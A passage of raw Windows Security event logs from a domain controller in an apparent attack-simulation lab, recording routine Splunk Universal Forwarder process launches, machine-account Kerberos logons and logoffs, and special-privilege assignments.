Account Domain: ATTACKRANGE
Logon ID: 0x865987
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:35:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264776
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1678
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264778
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264777
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264779
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264780
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264782
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264781
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264785
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86937B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264784
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x86937B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53682
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264783
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86937B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:36:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264786
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264788
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264787
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264789
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264790
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264792
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264791
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1624
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264795
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86DDD8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264794
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x86DDD8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53695
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:36:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264793
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86DDD8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264796
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264798
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1758
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:08 PM
LogName=Security
